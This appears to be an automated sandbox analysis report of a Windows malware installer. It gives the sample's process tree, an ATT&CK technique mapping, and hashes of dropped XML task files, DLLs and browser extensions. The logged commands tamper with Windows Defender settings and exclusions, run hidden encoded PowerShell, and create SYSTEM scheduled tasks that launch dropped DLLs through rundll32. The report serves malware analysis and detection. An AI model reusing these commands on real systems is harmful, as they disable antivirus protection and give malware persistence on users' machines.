"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1932

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gndCUhvio" /SC once /ST 03:44:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2028

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gndCUhvio"
3⤵
PID:2088

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gndCUhvio"
3⤵
PID:2516

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
3⤵
PID:804

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
4⤵
PID:1660

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
3⤵
PID:2644

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
4⤵
PID:2604

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "nsbPTSdSgPuDRRbhc" /SC once /ST 01:03:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\aqigWbl.exe\" X4 /ZZKgdidDA 525403 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2476

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "nsbPTSdSgPuDRRbhc"
3⤵
PID:2960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 408
3⤵
- Loads dropped DLL
- Program crash
PID:2364

C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\aqigWbl.exe
C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\aqigWbl.exe X4 /ZZKgdidDA 525403 /S
2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2288

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bmQWCxleEgxbTUrSZz"
3⤵
PID:2420

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
3⤵
PID:2684

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
4⤵
PID:2244

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
PID:2160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2852

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
4⤵
PID:2084

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
5⤵
PID:2796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:996

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\VcCVDDBRU\WLXbDq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RShenKKeUbJzTjI" /V1 /F
3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2780

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "RShenKKeUbJzTjI2" /F /xml "C:\Program Files (x86)\VcCVDDBRU\eCQkJFh.xml" /RU "SYSTEM"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2604

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "RShenKKeUbJzTjI"
3⤵
PID:2484

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "RShenKKeUbJzTjI"
3⤵
PID:2468

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YyXYwmYoaLUdkV" /F /xml "C:\Program Files (x86)\ATiuMetuMWHU2\COqjuWk.xml" /RU "SYSTEM"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2356

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "sCSWtvWCwRQeU2" /F /xml "C:\ProgramData\NonltQQlyMoZtVVB\NIOfOwf.xml" /RU "SYSTEM"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2808

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "iHEexGxGyKiKPpGUc2" /F /xml "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\QJXDrNj.xml" /RU "SYSTEM"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:2916

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bvITFfrvNmRFeACLPQX2" /F /xml "C:\Program Files (x86)\UyPATDbiwjgOC\CRSpgaD.xml" /RU "SYSTEM"
3⤵
- Scheduled Task/Job: Scheduled Task
PID:500

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ROHimGgVjIIdgMKwK" /SC once /ST 02:28:47 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ruCXiJvmKkuTmmIt\QgtJvtgJ\YaQqufJ.dll\",#1 /bkKdidGW 525403" /V1 /F
3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1008

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ROHimGgVjIIdgMKwK"
3⤵
PID:1824

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "nsbPTSdSgPuDRRbhc"
3⤵
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 1544
3⤵
- Loads dropped DLL
- Program crash
PID:2528

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ruCXiJvmKkuTmmIt\QgtJvtgJ\YaQqufJ.dll",#1 /bkKdidGW 525403
2⤵
PID:1564

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ruCXiJvmKkuTmmIt\QgtJvtgJ\YaQqufJ.dll",#1 /bkKdidGW 525403
3⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1616

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ROHimGgVjIIdgMKwK"
4⤵
PID:696

C:\Windows\system32\taskeng.exe
taskeng.exe {D2B9ED3F-B9EE-47B9-8172-E87DF68240BD} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:848

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2232

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2528

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1052

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1068

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

Scheduled Task/Job

Scheduled Task

Persistence

Create or Modify System Process

Windows Service

Scheduled Task/Job

Scheduled Task

Privilege Escalation

Create or Modify System Process

Windows Service

Scheduled Task/Job

Scheduled Task

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\ATiuMetuMWHU2\COqjuWk.xml
Filesize
2KB

MD5
22f03446b92d4770c00a40d99cfe9833

SHA1
0245fe25f5f0ed85098d593983bff33a396575f2

SHA256
aa41244324bcda5d3d37ade189bbd22dfcb8ea73fd4530c8be6a5b52cb41e5ed

SHA512
638d4949061561192dc9fccfe860ded745f71f9812162f76db64cbff55d6786821fa3f7b015f1b14db3c597ad89a7f26ee00475fe79139c73bcf0c7994a39cc3

Download Submit
C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\QJXDrNj.xml
Filesize
2KB

MD5
d8254633f03e7ca31e9d575bbd36080f

SHA1
3a5ecc8ab9836773734f2ca5690792135f814cbe

SHA256
de63e2bee2518944c7aae863339bee3a4186bf44688f4cf00bae6f4ebf62144d

SHA512
858a95381894cfb67b1c70c09528bfdfcc043e2cb1d979ef1840e475a242b9a4fe703c9070d4687b6e9e1222e89ee53056cf47a89368e20b22186cda705129c8

Download Submit
C:\Program Files (x86)\UyPATDbiwjgOC\CRSpgaD.xml
Filesize
2KB

MD5
7302de347337fc9fa029cfec784be9a9

SHA1
58255fed32a57c78d69be674711861b9a53c8663

SHA256
d3ea99112cc187355e4f4e001270669600355bf3f65facca5c5d21d513adc38a

SHA512
ff35f70d1b49f1ef72c6d56ea3d68ff614a515e7b929abffff9db75b446b3932260c3de5453b317a4835ddaa58226f2b5580e30b716ec2d1f065fc90966c6eaf

Download Submit
C:\Program Files (x86)\VcCVDDBRU\eCQkJFh.xml
Filesize
2KB

MD5
1e3f5b81bac5465f170617a0187cc4d0

SHA1
7760519d1b260898f05bbdae1f1ea7b8887be2f0

SHA256
c0ef01eb5876f791b20c854370fc3dabc381ce5b7e56ceb1079a24322317a766

SHA512
9acec2dd570ef888267c5d3bef9904e2f4c2f1ab1dd8aac4416bc2315653991609271cb9c2805583a561c8ed3e5b575e741fba8d21fd8cdef2d973fe956f92cf

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
Filesize
2.5MB

MD5
30797b98d8db429a8d2589142463616d

SHA1
2d45aa8dd391e9907b85e936c2a0f093fccc9580

SHA256
9744b87e5e6b11b9d59d0e1ce6949d6444e533782cb4661ad50d83a15fa1903d

SHA512
4c1b09ff4de7ac44e84edfe5533adbaff949f3acab28c11839a44d1b5a6266d3f11fb02439cbb34b8e072ca638b032f2d57b01112ba499c1608a8926da3f5cf9

Download Submit
C:\ProgramData\NonltQQlyMoZtVVB\NIOfOwf.xml
Filesize
2KB

MD5
6fe691170127fa3e00517d93107125b9

SHA1
6382a2d98ddba6ab1ca27b67f7eed6a28fdafd19

SHA256
751b132dfe94f42e94fd2955e1007afa48c31976122b5f24d553f260e635c777

SHA512
673d4ee2d32d8ddfb60a6d1619e2f431352a3aad875ee459574da5485e0c7151970de60a7db2446205ce53e0d10be26c822cd60bec8e25c9ca8f988156e1b9da

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
10KB

MD5
bcbaa2944d80d4e85dad86df3834e009

SHA1
36dd8fe5910b71cc7ab4430133d71d624a9e36e5

SHA256
fdb407ac24f68d2ba3763a45600a13b76f97d1ae4b2e92561dff8bd9e58c12c7

SHA512
8c02fc35a9ea67ad2f0c13697d433e592251a06db72a2a7b9e63aadff77647620c08ba25379eaffacf271c52a69992caf7a18890736510addd10d47f92d6c35d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Filesize
28KB

MD5
665c72880cbb967d73c4477427726950

SHA1
633ecd82f51cf22c3eeac81f0931ddbe82484acf

SHA256
87559ad1251978b91b1d749cd2418a135efe2f85951a6e90d3f3a22ec814d955

SHA512
2dbd6e9b062151e5e0a91ce77c8402e41e4f182d799c84c733f66635ad3e532513e3d8b87878c37d4edf61029848c979a386ed5fa1b775f2de60e60d34b34479

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
ee5e5bf39550a7f291c5d1ec0a9b7ba8

SHA1
444be94dba0cdb3b1897ed1177abd97af279af25

SHA256
ffce191b6c89087f9074e6dcf58557532770bd908e1fedaab24fd7e4aec1b78b

SHA512
26dfd32944134b8028318fbe8405705f24245e8e051b2380fae021103b5e188f9fcb6314fa16993257e975dfe7da815dcd2563ee1fa0d0a1e8bac78b97dcf5d2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XM5SMPEZ3BW4L1BRVL0X.temp
Filesize
7KB

MD5
f42140de7be9bc4cb08e29fdc32ab908

SHA1
be21c91f86074d1339b7cdeabe6d9e96efa7bcfe

SHA256
dd4d817702861055abde271acd7cf2ed8e79da7c60d16f8b7157c8fac2d2c9fc

SHA512
378547f27f21c744e06b819d2a238029dafb97d5d8e3492701fcc954a5e09e161d44ea91d5de6ccdd24051d510b2f50b966e1029f8d752853434d5f2cb01bbc0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0rowjuc9.default-release\prefs.js
Filesize
7KB

MD5
a3bc62e63156b917378f6edbad41565b

SHA1
f66cd88df683cfd9456243471b2494db20166c1e

SHA256
98ee8b118ad505f06040dd0f3720139d2cd3f09303fc58b6d465129c126dbcde

SHA512
800153a01ad363c284d9ba452f6e333368cb55fadc1f4ce8a280c67fce0b08bbce2f6029501a340dde5676aeca6dad8d0199aa009c33ba853e4560a313d7f418

Download Submit
C:\Windows\Temp\ruCXiJvmKkuTmmIt\QgtJvtgJ\YaQqufJ.dll
Filesize
6.4MB

MD5
d2aff308118773da5201fe22031e0a1a

SHA1
41e73df772d0803b968330cd41667c3853beca32

SHA256
2ac07503ca0f99cd53512eacaaf57aeb4372757d489df640c54af28d0ed5e8a1

SHA512
78a5b56996835e928410545ea6e12f0127fbdf638b6c8ae8ac95303eb7a0253d107a344e9492b36b86bc0ec62216676628661ba3c0c711804e6ee675a4b45b23

Download Submit
C:\Windows\Temp\ruCXiJvmKkuTmmIt\ZkbXpEgH\psBAZOHlkJGKQgnE.wsf
Filesize
9KB

MD5
fcd1dcffdafc761e593227fb1cca0003

SHA1
f355b20d52753d7542815e94db426c2dcfc650c0

SHA256
26f5faece58ab24d85b648f8e8c9b99070a164aef1314a70adac8d352e23d398

SHA512
0fbbee590d60afad99bd6a7669ba4e45884ee4b150b4a5c070c2b2c63f8d16ce0dd5d495b7fc250bef82269a399a619ad1329a35a6cdbdf67252e47214f2c8c4

Download Submit
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
Filesize
6KB

MD5
968286be198ff595f13097db81ab33be

SHA1
ca9002773f6baf6c7fd573531fbc7e86258c9efe

SHA256
eeda5df56623ebdce4399f804708962d1c643c0960571345ca800bf47fff6d58

SHA512
38bbb71b678fa210ce2faa469a4d88e1da754e80268c89e7f651d267a501818d76ebd7b53d4ea51fc2427bac4c365a2aa85cc57f19364af7ca4f0feb67f1705d

Download Submit
\Users\Admin\AppData\Local\Temp\7zS257B.tmp\Install.exe
Filesize
6.4MB

MD5
2f213aeee509ac52d7f30014050d6930

SHA1
3e1dac497d83fa0aee016042a544ff09edcacfd5

SHA256
600a70c40047210479d1e04cb16ba4a49dd58349979c52d35bd3be294da99a21

SHA512
7d5f5290f5762811d7d1a1f55038f99b2f00ab7ea4c429b629069d755690c9da87395ce2dea8fa84aa54cc77655349b31b9dbe6258398b2757ad582e5cef1df7

Download Submit
\Users\Admin\AppData\Local\Temp\7zS2D67.tmp\Install.exe
Filesize
6.7MB

MD5
84da5fc2f43e551848349f0d0d3faca4

SHA1
cf0078c71fb1ef9743451b6a20d9aa0306e697db

SHA256
1989cb898e0e397b9acc16c453c94cf3f1873573979d36873182b18b8da86938

SHA512
9a605654c70dc27ae52760b2ced4aa3eedda6e98919ef96d9615c754f07e12c1748f6f978ffc916cb693e7788b21dc101a2442e3251f9a598aa223d9ead238bd

Download Submit
memory/848-62-0x0000000002280000-0x0000000002288000-memory.dmp

Filesize
32KB

Download
memory/848-61-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/1616-344-0x00000000015A0000-0x0000000005162000-memory.dmp

Filesize
59.8MB

Download
memory/1968-40-0x0000000000290000-0x0000000000944000-memory.dmp

Filesize
6.7MB

Download
memory/1968-63-0x0000000000290000-0x0000000000944000-memory.dmp

Filesize
6.7MB

Download
memory/1968-82-0x0000000000290000-0x0000000000944000-memory.dmp

Filesize
6.7MB

Download
memory/1968-41-0x0000000010000000-0x0000000013BC2000-memory.dmp

Filesize
59.8MB

Download
memory/2104-34-0x00000000022B0000-0x0000000002964000-memory.dmp

Filesize
6.7MB

Download
memory/2104-22-0x00000000022B0000-0x0000000002964000-memory.dmp

Filesize
6.7MB

Download
memory/2288-356-0x0000000000D70000-0x0000000001424000-memory.dmp

Filesize
6.7MB

Download
memory/2288-81-0x0000000000D70000-0x0000000001424000-memory.dmp

Filesize
6.7MB

Download
memory/2288-321-0x00000000037D0000-0x00000000038B4000-memory.dmp

Filesize
912KB

Download
memory/2288-83-0x0000000010000000-0x0000000013BC2000-memory.dmp

Filesize
59.8MB

Download
memory/2288-128-0x0000000002150000-0x00000000021B6000-memory.dmp

Filesize
408KB

Download
memory/2288-95-0x00000000022D0000-0x0000000002355000-memory.dmp

Filesize
532KB

Download
memory/2288-311-0x0000000002CA0000-0x0000000002D25000-memory.dmp

Filesize
532KB

Download
memory/2320-52-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/2320-51-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/2620-36-0x0000000001110000-0x00000000017C4000-memory.dmp

Filesize
6.7MB

Download
memory/2620-24-0x0000000001110000-0x00000000017C4000-memory.dmp

Filesize
6.7MB

Download
memory/2620-26-0x0000000010000000-0x0000000013BC2000-memory.dmp

Filesize
59.8MB

Download
memory/2620-25-0x00000000008D0000-0x0000000000F84000-memory.dmp

Filesize
6.7MB

Download
memory/2620-35-0x0000000001110000-0x00000000017C4000-memory.dmp

Filesize
6.7MB

Download
memory/2620-23-0x0000000001110000-0x00000000017C4000-memory.dmp

Filesize
6.7MB

Download
memory/2620-37-0x00000000008D0000-0x0000000000F84000-memory.dmp

Filesize
6.7MB

Download